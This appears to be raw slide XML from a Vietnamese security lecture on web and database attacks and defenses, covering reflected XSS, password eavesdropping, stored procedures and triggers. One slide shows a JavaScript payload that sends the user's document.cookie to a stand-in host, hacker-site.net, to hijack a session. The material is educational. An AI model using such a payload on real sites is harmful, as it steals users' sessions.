                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{AF524F44-140B-362F-B22D-42DE1D172B89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12008040" y="8699016"/>
            <a:ext cx="4267199" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="28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800" b="1" i="0">
              <a:solidFill>
                <a:srgbClr val="1B1B1B"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{70B23572-8F80-FDC3-BCAD-2B013AE1F655}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7876664" y="9069258"/>
            <a:ext cx="67519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15</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18625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780C51B3-1C39-F3D6-61B1-D48513633031}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="533400" y="2095499"/>
            <a:ext cx="17602199" cy="8063089"/>
            <a:chOff x="40798" y="71151"/>
            <a:chExt cx="3271246" cy="2164112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Freeform 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns=""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28DE5E8F-3B54-5419-DCAA-2DC10C525997}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="965202" y="2267318"/>
            <a:ext cx="11049000" cy="1077218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pP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vi-VN"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 cuộc tấn công có thể từ nhiều nguyên nhân (lỗ hổng) khác nhau</a:t>
            </a:r>
            <a:endPar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F376A559-FC04-E6A7-4EFA-A2EC2D2B6F90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="933195" y="3418945"/>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Reflected XSS</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85901E13-8050-B840-6930-CA719FF60921}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10124142" y="3162300"/>
            <a:ext cx="7923070" cy="6432624"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{11EAA026-F022-65C3-5996-DB0E9576C341}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="929076" y="4169696"/>
            <a:ext cx="9106679" cy="4708981"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Người dùng đăng nhập web và giả sử được gán session:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Set-Cookie: sessId=5e2c648fa5ef8d653adeede595dcdee4e59d4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>acker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>gửi cho người dùng URL:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="2B6DAD"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> là website nạn nhân truy cập, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="2B6DAD"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>hacker-site.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> là trang của hacker tạo ra</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Đoạn javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>như sau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>var i=new Image; i.src=”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="2B6DAD"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>http://hacker-site.net/”+document.cookie;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="2B6DAD"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>với tham số là cookie người dùng:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="0" i="0">
              <a:solidFill>
                <a:srgbClr val="1B1B1B"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Từ phía site của mình, hacker sẽ bắt được nội dung request trên và coi như session của người dùng sẽ bị chiếm. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{F25E4AAD-25C8-3CBA-B32F-B019ACB395DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12014202" y="9594925"/>
            <a:ext cx="38100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7" name="Slide Number Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{CC379DCD-393D-0DDD-F8C5-8789917864C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8100671" y="9792038"/>
            <a:ext cx="7562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16</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3340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2" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns=""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780C51B3-1C39-F3D6-61B1-D48513633031}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="533400" y="2095499"/>
            <a:ext cx="17602199" cy="8063089"/>
            <a:chOff x="40798" y="71151"/>
            <a:chExt cx="3271246" cy="2164112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Freeform 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns=""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Box 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns=""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28DE5E8F-3B54-5419-DCAA-2DC10C525997}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="965202" y="2267318"/>
            <a:ext cx="11049000" cy="1077218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pP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vi-VN"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 cuộc tấn công có thể từ nhiều nguyên nhân (lỗ hổng) khác nhau</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="32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F376A559-FC04-E6A7-4EFA-A2EC2D2B6F90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="933195" y="3418945"/>
            <a:ext cx="9863328" cy="553998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="30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3.3 Nghe lén và đánh cắp mật khẩu</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="30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Slide Number Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{CC379DCD-393D-0DDD-F8C5-8789917864C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8100671" y="9792038"/>
            <a:ext cx="7562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17</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>/23</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="A close-up of a person listening to a person&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{72B85E13-BDAB-EBE1-43DF-FD9E1F933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1159" y="4553598"/>
            <a:ext cx="6482082" cy="36379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9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{4A0DCD66-A538-7A03-5550-664768D17ECF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4244442628"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="929076" y="4169696"/>
          <a:ext cx="9106679" cy="45975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1618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5B1938C7-B2E7-549E-E912-38644658EDCE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="611350" y="2734353"/>
            <a:ext cx="17602199" cy="7322035"/>
            <a:chOff x="40798" y="71151"/>
            <a:chExt cx="3271246" cy="2164112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Freeform 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns=""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92C952F-5830-C262-DE02-E1A1A203006A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="3568937"/>
            <a:ext cx="8686799" cy="4262705"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3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Sử dụng Store procedure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pP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 của cơ sở dữ liệu không thể dựa vào bảo mật của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hệ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 phần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mềm khác</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mà</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ơ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sở dữ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 có khả năng</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tự </a:t>
            </a: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vệ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 nó</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t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN"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ể </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-V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chèn, sửa đổi hoặc xóa dữ liệu là thông qua các quy trình được </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN"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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" kern="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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN"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 </a:t>
            </a:r>
            <a:r>
              <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theo dõi.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="32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3C769EE5-76AF-F159-C45A-27C5CE80E0E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12656019" y="9513835"/>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8" name="Slide Number Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{AE67DDB3-7A5A-767D-1E51-4D6D31AF507C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7948981" y="9562104"/>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18</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>/23</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{412C8808-BDD9-D544-2869-AB2AC3F86BB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10514340" y="3201666"/>
            <a:ext cx="7251902" cy="6312169"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42476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5B1938C7-B2E7-549E-E912-38644658EDCE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="611350" y="2734353"/>
            <a:ext cx="17602199" cy="7322035"/>
            <a:chOff x="40798" y="71151"/>
            <a:chExt cx="3271246" cy="2164112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Freeform 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns=""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92C952F-5830-C262-DE02-E1A1A203006A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="3597751"/>
            <a:ext cx="8686799" cy="1154162"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3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Sử dụng Trigger</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3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spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Để theo dõi các giá trị mà người dùng đã thực thi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="32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3C769EE5-76AF-F159-C45A-27C5CE80E0E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12656019" y="9513835"/>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C15021DF-39F0-0758-F81A-8E026D0A79EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10408746" y="2915207"/>
            <a:ext cx="7325214" cy="6598627"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Slide Number Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{AE67DDB3-7A5A-767D-1E51-4D6D31AF507C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7948981" y="9562104"/>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19</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262105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dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="9A6547"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Danh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="10400" u="none" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="9A6547"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="10400" u="none" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="9A6547"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>sách</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="10400" u="none" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="9A6547"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="10400" u="none" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="9A6547"/>
                </a:solidFill>
